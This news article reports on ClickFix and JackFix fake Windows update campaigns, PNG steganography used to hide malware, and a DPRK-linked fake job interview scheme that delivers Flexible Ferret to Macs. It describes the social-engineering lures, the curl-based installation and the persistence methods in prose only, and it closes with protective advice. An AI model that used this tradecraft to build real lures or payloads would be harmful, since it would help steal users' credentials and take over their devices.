It’s been another turbulent week for computer users, as fresh reports highlight a surge in sophisticated cyberattacks targeting both Windows and Mac operating systems. From fake Windows security updates to bogus job interviews for Mac users, hackers are deploying cunning social engineering tactics and technical sleights of hand to steal credentials, install malware, and gain long-term access to victims’ devices. The latest threat intelligence from Huntress, Acronis, and Malwarebytes paints a picture of a digital landscape where vigilance is more crucial than ever.
According to Forbes, a November 26, 2025 update from the Acronis Threat Research Unit has sounded the alarm on a new wave of ClickFix cyberattack campaigns. These attacks leverage fake Windows security update prompts—so realistic that even seasoned users might be fooled—to trick people into running malicious commands. The attackers’ strategy? Simple but effective: they present users with what appear to be urgent system updates, complete with full-screen Windows Security Update visuals, and instruct them to copy and paste commands into the Windows run prompt. In reality, these commands execute malware that can steal credentials and compromise the entire system.
Huntress security analysts Ben Folland and Anna Pham, cited by Forbes, uncovered a particularly devious twist in this campaign: the use of steganography. Rather than simply appending malicious data to files, the attackers encode their malware directly within the pixel data of PNG images. By manipulating specific color channels, they can reconstruct and decrypt the payload in memory, making detection by traditional antivirus tools much harder. As Folland and Pham put it, “A notable discovery during analysis was the campaign's use of steganography to conceal the final malware stages within an image.”
But the psychological manipulation doesn’t stop there. The Acronis Threat Research Unit described a variant they call the JackFix attack, which combines the fake Windows update with screen hijacking techniques. Eliad Kimhy from Acronis explained that attackers often lure victims through adult-themed websites, increasing the pressure to comply with sudden security update instructions. “The adult theme, and possible connection to shady websites,” Kimhy said, “adds to the victim’s psychological pressure, making victims more likely to comply with sudden security update installation instructions.” This campaign also obfuscates both the commands and the payload, helping it evade current ClickFix prevention and detection methods.
The scale of the threat is significant. Microsoft itself has warned that ClickFix is now the most common method for hackers to gain initial access, accounting for 47 percent of attacks observed in Microsoft Defender notifications. These numbers underscore just how widespread and effective these social engineering attacks have become.
While Windows users grapple with these evolving threats, Mac users are facing their own wave of targeted attacks. A November 26, 2025 report from Malwarebytes details a campaign dubbed Contagious Interview, which preys on job seekers by impersonating recruiters—often via LinkedIn—and directing them to fake job websites. The attackers, believed to be associated with the Democratic People’s Republic of Korea (DPRK), pose as representatives of well-known brands and entice victims to apply for roles ranging from software development and AI research to cryptocurrency and non-technical positions.
The ruse is elaborate: after initial contact, the victim is asked to record a video introduction and upload it to a special website. Once on the site, the applicant is told that their camera or microphone access is blocked. To “fix” this, the site prompts them to download an “update” for FFmpeg, a legitimate media-processing tool. But the download is a trojan horse—a backdoor designed to compromise the system.
Much like the ClickFix attacks, the site instructs victims to run a curl command in their Terminal, which downloads and executes a script that installs the malware. The campaign’s endgame is Flexible Ferret, a multi-stage macOS malware chain active since early 2025. Once installed, Flexible Ferret creates a LaunchAgent, ensuring the malware reloads every time the user logs in. This grants attackers persistent, covert access to the infected Mac.
Flexible Ferret’s capabilities are extensive and dangerous. The core payload is a Go-based backdoor that enables attackers to collect detailed information about the victim’s device, upload and download files, execute shell commands (giving full system control), extract Chrome browser profile data, and automate further credential and data theft. After stealing the user’s password—prompted by a fake Chrome window—the malware immediately establishes persistence and connects to the attackers’ infrastructure, turning the compromised Mac into a node in a remote-controlled botnet.
Windows users aren’t off the hook, either. The same lure is used, but instead of Flexible Ferret, victims receive a different malware variant called InvisibleFerret, designed to steal information from Windows systems. This cross-platform approach demonstrates the attackers’ adaptability and the growing convergence of threats facing users of all major operating systems.
So, what can users do to protect themselves? Security experts across the board agree: awareness and caution are the best defenses. For Windows users, the most important rule is never to copy and paste commands from a website into the Windows run prompt—genuine Windows security updates simply do not require this. As Forbes emphasized, “a genuine Windows security update, just like the fake CAPTCHA screens employed before, will never, ever, require the user to cut and paste commands into the Windows run prompt from a web page.”
For Mac users, the advice is similar: never run code or commands you don’t fully understand, especially if prompted by a website or unsolicited communication. Always verify the legitimacy of software updates and job offers independently. Malwarebytes also recommends keeping your operating system, software, and security tools updated with the latest patches, using real-time anti-malware with web protection, and being wary of unsolicited messages, especially those inviting you to meetings or requesting software installs.
Both reports stress the importance of checking URLs carefully and verifying the authenticity of any communication before clicking links or downloading attachments. If in doubt, consult official documentation or contact support directly—better safe than sorry.
The recent surge in these campaigns highlights just how creative and persistent cybercriminals have become. By blending technical sophistication with psychological manipulation, they’re finding new ways to exploit trust and urgency. While tech giants like Microsoft continue to patch vulnerabilities and issue security updates—even for unsupported operating systems like Windows 10—the responsibility for staying safe is increasingly shared between companies and individual users.
As the year draws to a close, the message from security researchers is clear: stay alert, question unexpected prompts, and never underestimate the lengths to which attackers will go. The latest wave of attacks is a stark reminder that, in the digital world, a little skepticism can go a long way.
